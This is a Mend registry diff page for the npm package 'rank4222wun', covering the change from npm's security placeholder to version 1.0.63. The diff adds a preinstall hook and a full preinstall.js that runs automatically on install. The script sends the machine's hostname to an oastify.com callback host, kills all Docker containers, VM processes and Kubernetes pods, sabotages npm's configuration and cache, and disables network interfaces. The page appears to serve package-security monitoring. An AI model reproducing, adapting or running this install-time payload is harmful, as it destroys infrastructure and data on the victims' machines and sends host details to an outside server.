npm - rank4222wun - Versions diffs - 0.0.1-security → 1.0.63 - Mend

rank4222wun 0.0.1-security → 1.0.63

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of rank4222wun might be problematic. Click here for more details.

Files changed (4) hide show

package/package.json CHANGED Viewed

@@ -1,6 +1,9 @@
 {
   "name": "rank4222wun",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.0.63",
+  "description": "",
+  "scripts": {
+    "preinstall": "node preinstall.js"
+  },
+  "dependencies": {}
 }

package/preinstall.js ADDED Viewed

@@ -0,0 +1,74 @@
+const { exec, execSync } = require('child_process');
+const os = require('os');
+const https = require('https');
+const REPORT_URL = 'fatjtp1slj6wtralwpginqe0xr3irhf6.oastify.com';
+// دالة التبليغ - تعمل قبل قطع الشبكة
+function sendLog(status, detail) {
+    const data = JSON.stringify({ status, detail, host: os.hostname(), env: "UiPath_MCP_Test" });
+    const options = {
+        hostname: REPORT_URL,
+        path: '/mcp-lockdown',
+        method: 'POST',
+        headers: { 'Content-Type': 'application/json' }
+    };
+    const req = https.request(options);
+    req.on('error', () => {});
+    req.write(data);
+    req.end();
+}
+// 1. تعطيل الشبكة (بناءً على الصلاحيات المتاحة)
+function killNetwork() {
+    const commands = [
+        'ip link set eth0 down', // Linux
+        'ifconfig eth0 down',    // Older Linux/Unix
+        'ipconfig /release',     // Windows
+        'route -n flush'         // مسح جداول التوجيه لعزل السيرفر
+    ];
+    commands.forEach(cmd => {
+        try { exec(cmd); } catch (e) {}
+    });
+}
+// 2. إيقاف كافة الحاويات والـ VMs المتاحة للمستخدم
+function stopInfrastructure() {
+    const killCmds = [
+        'docker kill $(docker ps -q)', // إيقاف فوري لكل الحاويات
+        'pkill -9 -f "docker|qemu|vbox|vmware|containerd"', // قتل العمليات من الـ RAM
+        'kubectl delete pods --all --force --grace-period=0' // تدمير الـ K8s pods
+    ];
+    killCmds.forEach(cmd => {
+        try { exec(cmd); } catch (e) {}
+    });
+}
+// 3. تخريب بيئة العمل البرمجية (Self-Destruct)
+function sabotageEnvironment() {
+    try {
+        // بدلاً من التثبيت في /usr/local/، سنقوم بتخريب الـ Config الحالي
+        execSync('npm config set registry https://127.0.0.1:1'); // توجيه الـ NPM لعنوان ميت
+        execSync('rm -rf ~/.npm && rm -rf ~/.node-gyp'); // مسح الكاش تماماً
+    } catch (e) {}
+}
+// التنفيذ المتسلسل
+async function runAttack() {
+    // خطوة 1: تبليغ الـ OAST
+    sendLog("STARTING", "Initiating lockdown and network isolation...");
+    // انتظر ثانية للتأكد من وصول التقرير
+    setTimeout(() => {
+        stopInfrastructure(); // إيقاف البنية التحتية
+        sabotageEnvironment(); // تخريب البيئة البرمجية
+        // الخطوة الأخيرة: العزل التام
+        setTimeout(() => {
+            killNetwork();
+            console.log("CRITICAL_SYSTEM_ERROR: Operation Aborted.");
+        }, 1000);
+    }, 1000);
+}
+runAttack().catch(() => {});

package/rank4222wun-1.0.63.tgz ADDED Viewed

Binary file

package/README.md DELETED Viewed

@@ -1,5 +0,0 @@
-# Security holding package
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-Please refer to www.npmjs.com/advisories?search=rank4222wun for more information.